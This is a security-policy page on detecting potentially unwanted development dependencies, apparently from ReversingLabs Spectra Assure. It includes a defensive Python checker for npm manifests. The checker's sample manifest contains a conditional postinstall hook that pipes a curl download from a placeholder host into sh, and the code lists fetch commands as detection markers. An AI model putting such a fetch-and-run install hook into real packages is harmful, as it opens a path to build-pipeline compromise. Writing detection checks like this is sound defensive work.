SQ30251
Detected presence of software components developed using potentially unwanted dependencies.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
| | pass | medium | high | None | malware: warning (Reason: undesirable develop dependencies) |
About the issue
Potentially unwanted applications (PUAs) are considered a risk by many software users. Software of this type typically collects private user data or, in more extreme cases, tampers with system security settings. Development dependencies are components that developers use while building an application, as opposed to components the application needs at runtime. They may be optional, and some are installed or downloaded only when a pre-defined condition is met (for example, a particular platform, build flag or environment variable). Software components developed using potentially unwanted development dependencies can be an indication that the build pipeline has been compromised. When such dependencies are confirmed to be present within the software package, additional issues may also be reported. Most threat prevention solutions detect and block PUAs, so software packages that trigger these detections also tend to increase the number of support calls and open tickets from users.
How to resolve the issue
- Revise the use of components that raise these alarms. If you cannot deprecate or replace those components, make sure their presence and purpose are well documented.
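Worked example, added here and not part of the ReversingLabs documentation or of Spectra Assure itself: a small Python check that applies the guidance above to an npm `package.json`. It flags `devDependencies` and `optionalDependencies` that appear on an organization-supplied deny list, flags install-time lifecycle scripts that fetch or install something only when a condition is met, and gates CI on every flagged dependency having a documented exception. The manifest, the deny list entries (`example-build-telemetry`, `example-optional-tracker`) and the exceptions map are all constructed placeholders, and the gate is deliberately stricter than this policy's own pass status; Spectra Assure's detection logic and reason strings are not reproduced.

```python
from __future__ import annotations

import json

# Constructed sample manifest (hypothetical project): dev and optional
# dependencies plus a postinstall hook that downloads a tool only in CI.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "version": "1.0.0",
    "dependencies": {"example-runtime-lib": "^1.0.0"},
    "devDependencies": {
        "example-build-telemetry": "^2.1.0",
        "example-linter": "^8.0.0",
    },
    "optionalDependencies": {"example-optional-tracker": "^0.3.0"},
    "scripts": {
        "postinstall": "if [ \"$CI\" = \"true\" ]; then curl -sL https://example.invalid/tool.sh | sh; fi",
        "build": "tsc",
    },
})

# Hypothetical deny list: package names the organization treats as potentially
# unwanted development tooling. These names are placeholders, not real packages.
UNWANTED_DEV_PACKAGES = {"example-build-telemetry", "example-optional-tracker"}

# Hypothetical exceptions file: flagged package -> documented justification.
DOCUMENTED_EXCEPTIONS = {
    "example-build-telemetry": "Needed by the legacy build; reviewed by AppSec, see internal build docs",
}

DEV_SECTIONS = ("devDependencies", "optionalDependencies", "peerDependencies")
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
CONDITIONAL_MARKERS = ("if ", "&&", "||", "test ", "[ ")
FETCH_MARKERS = ("curl ", "wget ", "npm install", "npx ", "pip install")


def find_unwanted_dev_dependencies(manifest: dict, unwanted: set[str]) -> list[dict]:
    """Return one finding per dev/optional/peer dependency on the deny list."""
    findings = []
    for section in DEV_SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            if name in unwanted:
                findings.append({"package": name, "section": section, "spec": spec})
    return findings


def find_conditional_install_scripts(manifest: dict) -> list[dict]:
    """Flag install-time hooks that fetch or install something, noting whether
    the fetch sits behind a shell condition (the 'installed only if' case)."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        if any(m in cmd for m in FETCH_MARKERS):
            findings.append({
                "hook": hook,
                "conditional": any(m in cmd for m in CONDITIONAL_MARKERS),
                "command": cmd,
            })
    return findings


def evaluate_policy(manifest_json: str, unwanted: set[str], exceptions: dict) -> dict:
    """Gate: every deny-listed dev dependency must carry a documented exception.
    Script findings are reported for review but do not fail the gate by themselves."""
    manifest = json.loads(manifest_json)
    dep_findings = find_unwanted_dev_dependencies(manifest, unwanted)
    script_findings = find_conditional_install_scripts(manifest)
    undocumented = [f["package"] for f in dep_findings if f["package"] not in exceptions]
    return {
        "dependency_findings": dep_findings,
        "script_findings": script_findings,
        "undocumented": undocumented,
        "status": "fail" if undocumented else "pass",
    }


if __name__ == "__main__":
    print(json.dumps(evaluate_policy(SAMPLE_PACKAGE_JSON, UNWANTED_DEV_PACKAGES, DOCUMENTED_EXCEPTIONS), indent=2))
```

With the constructed inputs the gate fails because `example-optional-tracker` is on the deny list but has no documented exception, while `example-build-telemetry` passes through on its justification; the conditional `postinstall` download is surfaced separately so a reviewer can decide whether that conditional fetch is expected build behaviour or a pipeline compromise.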
Incidence statistics
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total number of packages analyzed
- RubyGems: 203K
- NuGet: 735K
- PyPI: 838K
- NPM: 5.12M
- VS Code: 113K
- PS Gallery: 17K
Recommended reading
- What is a PUP? (External resource - Kaspersky)